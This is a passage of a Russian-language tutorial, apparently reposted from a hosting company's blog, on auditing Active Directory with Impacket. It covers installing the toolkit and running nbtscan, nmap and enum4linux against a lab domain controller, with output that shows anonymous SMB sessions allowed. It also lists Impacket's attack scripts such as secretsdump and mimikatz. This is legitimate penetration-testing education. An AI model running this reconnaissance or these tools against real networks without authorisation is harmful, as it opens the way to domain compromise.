{"id":350117,"date":"2023-07-11T15:03:11","date_gmt":"2023-07-11T15:03:11","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=350117"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=350117","title":{"rendered":"<span>Active Directory \u0433\u043b\u0430\u0437\u0430\u043c\u0438 Impacket<\/span>"},"content":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-1\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"><a href=\"https:\/\/habr.com\/ru\/company\/ruvds\/blog\/743444\/\"><\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/webt\/uw\/r2\/f1\/uwr2f11frwv_bhcznjhgaxq3eoe.png\" data-src=\"https:\/\/habrastorage.org\/webt\/uw\/r2\/f1\/uwr2f11frwv_bhcznjhgaxq3eoe.png\"\/><\/div>\n<p><\/a><br \/>  \u041f\u0440\u0438 \u0430\u0443\u0434\u0438\u0442\u0435 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 <b><font color=\"#3AC1EF\">Impacket<\/font><\/b> \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0432\u0435\u0439\u0446\u0430\u0440\u0441\u043a\u0438\u043c \u043d\u043e\u0436\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u043f\u043e \u0441\u0435\u0442\u0438, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u043e\u043f\u0440\u0438\u0435\u0442\u0430\u0440\u043d\u044b\u043c (\u0440\u043e\u0434\u043d\u044b\u043c \u0438\u043b\u0438 \u0443\u043c\u043e\u043b\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c) \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, 
\u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, PowerShell. \u041d\u043e \u0442\u0430\u043a \u0443\u0436 \u0441\u043b\u043e\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0438\u0437-\u043f\u043e\u0434 Linux \u2013 \u043d\u0435 \u043b\u0443\u0447\u0448\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e open source \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u0411\u0443\u0434\u0443\u0447\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0432\u043e\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u043c \u0432 IT-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 Python, Impacket \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b, \u0430 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0430\u0443\u0434\u0438\u0442, \u0441\u0442\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. 
\u0426\u0435\u043b\u044c\u044e \u0441\u0442\u0430\u0442\u044c\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Active Directory, \u0438 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0438\u043b\u044c\u043d\u044b\u0435 \u0435\u0433\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b. \u0424\u043e\u0440\u043c\u0430\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u2013 \u043e\u0431\u0437\u043e\u0440 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u0435\u0433\u043e \u0441\u043e\u0441\u0442\u0430\u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0441 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u043d\u0430\u0438\u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0445 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439. 
\u0421\u0442\u0430\u0442\u044c\u044f \u043d\u043e\u0441\u0438\u0442 \u043e\u0431\u0437\u043e\u0440\u043d\u044b\u0439 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f Impacket, \u0438 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0432 \u0442\u0435\u043c\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0437\u043d\u0430\u043a\u043e\u043c \u0441 Windows Server \u043d\u0435 \u043f\u043e\u043d\u0430\u0441\u043b\u044b\u0448\u043a\u0435, \u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c\u0438 \u0442\u043e\u043b\u043a\u043e\u043c \u0435\u0449\u0451 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.<br \/>  <a name=\"habracut\"><\/a><br \/>  <a href=\"https:\/\/github.com\/fortra\/impacket\">Impacket<\/a> \u2014 \u044d\u0442\u043e \u043d\u0430\u0431\u043e\u0440 \u043a\u043b\u0430\u0441\u0441\u043e\u0432 Python \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430\u043c\u0438, \u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0441 Active Directory. 
\u041f\u0440\u0435\u0434\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0432 Kali \u0438 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0435\u043c\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 (<i>\/usr\/share\/doc\/python3-impacket\/examples\/<\/i>). \u0415\u0441\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0432 \u043a\u0430\u043a\u043e\u043c-\u043d\u0438\u0431\u0443\u0434\u044c \u0445\u0438\u0442\u0440\u043e\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0435 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u043a\u043d\u043e\u0432\u0435\u043d\u043d\u044b\u0439 Debian, \u0442\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0432 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432, \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435:<\/p>\n<pre><code class=\"bash\">git clone https:\/\/github.com\/fortra\/impacket.git apt install python3-venv python3 -m venv venv source 
venv\/bin\/activate python3 -m pip install --upgrade pip pip3 install -r requirements.txt <\/code><\/pre>\n<p>  \u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0440\u0438 \u043a\u0430\u0436\u0434\u043e\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u043c \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0432\u044b\u0448\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0435. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u0441 Impacket, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043a\u0430\u0442\u0430\u043b\u043e\u0433 <i>venv<\/i>, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c:<\/p>\n<pre><code class=\"bash\">python3 -m venv venv <\/code><\/pre>\n<p>  \u0421\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0432\u044b\u0432\u043e\u0434 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442, \u0447\u0442\u043e \u0432\u0441\u0451 \u0441\u0434\u0435\u043b\u0430\u043d\u043e \u0432\u0435\u0440\u043d\u043e:<\/p>\n<pre><code class=\"bash\">(venv) <\/code><\/pre>\n<p>  \u0421 \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043e\u0431\u044a\u0435\u043a\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0433\u043e\u0442\u043e\u0432 \u043a \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044e.<\/p>\n<h2><font color=\"#3AC1EF\">1. 
\u0410\u043d\u0430\u043b\u0438\u0437 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0441\u0442\u0435\u043d\u0434\u0430<\/font><\/h2>\n<p>  \u0414\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043c\u0438\u043d\u0438\u043c\u0443\u043c L3 \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430. VPN \u0442\u043e\u0436\u0435 \u043f\u043e\u0434\u043e\u0439\u0434\u0451\u0442. \u0412 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0439 \u0441\u0435\u0442\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f:<\/p>\n<pre><code class=\"bash\"># apt install nbtscan  nbtscan -r 192.168.1.0\/24 Doing NBT name scan for addresses from 192.168.1.0\/24  IP address       NetBIOS Name     Server    User             MAC address ------------------------------------------------------------------------------ 192.168.1.13     WIN-LIELOSOD7LK  &lt;server>  &lt;unknown>        99:3f:d5:65:97:99 <\/code><\/pre>\n<p>  \u0410\u043d\u0430\u043b\u0438\u0437 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 TCP \u043f\u043e\u0440\u0442\u043e\u0432 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0442\u0438\u043f\u0438\u0447\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443 \u0440\u0430\u0431\u043e\u0442\u044b \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory:<\/p>\n<pre><code class=\"bash\"># apt install nmap  nmap 192.168.1.0\/24  Host is up (0.31s latency). 
Not shown: 987 closed tcp ports (reset) PORT     STATE SERVICE 53\/tcp   open  domain 88\/tcp   open  kerberos-sec 135\/tcp  open  msrpc 139\/tcp  open  netbios-ssn 389\/tcp  open  ldap 443\/tcp  open  https 445\/tcp  open  microsoft-ds 464\/tcp  open  kpasswd5 593\/tcp  open  http-rpc-epmap 636\/tcp  open  ldapssl 3268\/tcp open  globalcatLDAP 3269\/tcp open  globalcatLDAPssl 3389\/tcp open  ms-wbt-server <\/code><\/pre>\n<p>  \u0422\u0438\u043f\u0438\u0447\u043d\u0430\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043d\u0430 \u043d\u0451\u043c \u0437\u0430\u043f\u0443\u0449\u0435\u043d DNS \u0441\u0435\u0440\u0432\u0435\u0440 (53\/tcp \u043f\u043e\u0440\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f DNS \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0434\u043b\u044f \u0442\u0440\u0430\u043d\u0441\u0444\u0435\u0440\u0430 \u0437\u043e\u043d, 53\/udp \u043f\u043e\u0440\u0442 \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f DNS \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 <a href=\"https:\/\/ru.wikipedia.org\/wiki\/Kerberos\">Kerberos<\/a> \u0438 <a href=\"https:\/\/ru.wikipedia.org\/wiki\/LDAP\">Ldap<\/a>, \u0432\u0441\u0435 \u0442\u0440\u043e\u0435 \u0432 Windows-\u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0432\u044b\u0434\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430. 
\u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u0443\u0445\u043e\u0434\u0438\u0442\u044c \u043e\u0442 \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u0430 \u0440\u0430\u0437\u0433\u043e\u0432\u043e\u0440\u0430, \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u0432\u044b\u0448\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043b\u0443\u0447\u0448\u0435, \u0447\u0442\u043e \u043d\u0430\u043c \u043c\u043e\u0436\u0435\u0442 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0430\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u043b\u0443\u0436\u0431\u0430 <a href=\"https:\/\/ru.wikipedia.org\/wiki\/Server_Message_Block\">SMB<\/a>:<\/p>\n<pre><code class=\"bash\"># apt install enum4linux  enum4linux 192.168.1.13   Starting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Feb 15 04:22:31 2023  =========================================( Target Information )========================================= Target ........... 192.168.1.13 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none  ============================( Enumerating Workgroup\/Domain on 192.168.1.13 )============================ [+] Got domain\/workgroup name: AD  ================================( Nbtstat Information for 192.168.1.13 )================================ Looking up status of 192.168.1.13         WIN-LIELOSOD7LK &lt;00> -         B &lt;ACTIVE>  Workstation Service         AD              &lt;00> - &lt;GROUP> B &lt;ACTIVE>  Domain\/Workgroup Name         AD              &lt;1c> - &lt;GROUP> B &lt;ACTIVE>  Domain Controllers         WIN-LIELOSOD7LK &lt;20> -         B &lt;ACTIVE>  File Server Service         AD              &lt;1b> -         B &lt;ACTIVE>  Domain Master Browser  ===================================( Session Check on 192.168.1.13 )=================================== [+] Server 192.168.1.13 allows sessions using username '', password ''  ================================( Getting domain SID for 192.168.1.13 )================================ Domain Name: AD Domain Sid: S-1-5-21-1377681614-1103095939-2089592296 [+] Host is part of a domain (not a workgroup) <\/code><\/pre>\n<p>  <i>AD<\/i> \u2013 \u044d\u0442\u043e \u0438\u043c\u044f \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0438 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043e Windows 2000, \u0430 <i>WIN-LIELOSOD7LK<\/i> \u2013 \u0438\u043c\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430. 
\u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e \u0438\u043c\u044f \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory (\u0432 \u043e\u0431\u044b\u043a\u043d\u043e\u0432\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0446\u0438\u0438). \u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044f\u0441\u044c \u043e\u0442 \u0442\u0435\u043c\u044b, \u044d\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 PowerShell, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u0440\u0443\u0433\u0430\u0445 <a href=\"https:\/\/github.com\/PyroTek3\/PowerShell-AD-Recon\/blob\/master\/Discover-PSInterestingServices\">Recon<\/a> \u0438\u043b\u0438 <a href=\"https:\/\/github.com\/BloodHoundAD\/BloodHound\">BloodHound<\/a>:<\/p>\n<pre><code class=\"bash\">Discover-PSInterestingServices Invoke-BloodHound -SearchFores <\/code><\/pre>\n<p>  \u0412 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0434\u043e\u043c\u0435\u043d\u043e\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f <i>ad.ruvds.ru<\/i>, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, 
\u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u043c\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (<a href=\"https:\/\/ru.wikipedia.org\/wiki\/FQDN\">FQDN<\/a>) <i>WIN-LIELOSOD7LK.ad.ruvds.ru<\/i>. \u0414\u0430\u043b\u0435\u0435 \u0432\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0431\u0443\u0434\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.<\/p>\n<h2><font color=\"#3AC1EF\">2. Impacket \u2013 \u043c\u043e\u0449\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0430\u0443\u0434\u0438\u0442\u0430 Active Directory<\/font><br \/>  <\/h2>\n<p>  \u041f\u0430\u043a\u0435\u0442 Impacket \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0432\u043f\u0435\u0447\u0430\u0442\u043b\u044f\u044e\u0449\u0438\u0439 \u043d\u0430\u0431\u043e\u0440 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0447\u0430\u0441\u0442\u0443\u044e \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0441\u0430\u043c\u043e \u0437\u0430 \u0441\u0435\u0431\u044f. 
\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, <a href=\"https:\/\/github.com\/ParrotSec\/mimikatz\">mimikatz.py<\/a> \u2013 python \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043e\u0434\u043d\u043e\u0438\u043c\u0451\u043d\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430, \u044f\u0432\u043b\u044f\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u0434\u0435-\u0444\u0430\u043a\u0442\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c \u0432 \u043d\u0430\u0431\u043e\u0440\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0430\u0443\u0434\u0438\u0442\u0430 Windows. \u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439: <i>addcomputer.py, atexec.py, dcomexec.py, dpapi.py, esentutl.py, exchanger.py, findDelegation.py, GetADUsers.py, getArch.py, GetNPUsers.py, getPac.py, getST.py, getTGT.py, GetUserSPNs.py, goldenPac.py, karmaSMB.py, kintercept.py, lookupsid.py, mimikatz.py, mqtt_check.py, mssqlclient.py, mssqlinstance.py, netview.py, nmapAnswerMachine.py, ntfs-read.py, ntlmrelayx.py, ping6.py, ping.py, psexec.py, raiseChild.py, rdp_check.py, registry-read.py, reg.py, rpcdump.py, rpcmap.py, sambaPipe.py, samrdump.py, secretsdump.py, services.py, smbclient.py, smbexec.py, smbrelayx.py, smbserver.py, sniffer.py, sniff.py, split.py, ticketConverter.py, ticketer.py, wmiexec.py, wmipersist.py, wmiquery.py<\/i>.<\/p>\n<p>  \u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0443 \u0438\u0445 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0441\u0442\u0435\u043d\u0434\u0430. 
\u041e\u0431\u0449\u0438\u0439 \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441 \u0438 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0432\u0437\u044f\u0442\u044b \u0438\u0437 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e <i>help<\/i>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u043f\u0440\u044f\u0442\u0430\u043d\u044b \u0432 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u043f\u043e\u0434 \u0441\u043f\u043e\u0439\u043b\u0435\u0440\u044b. \u0415\u0441\u043b\u0438 \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e 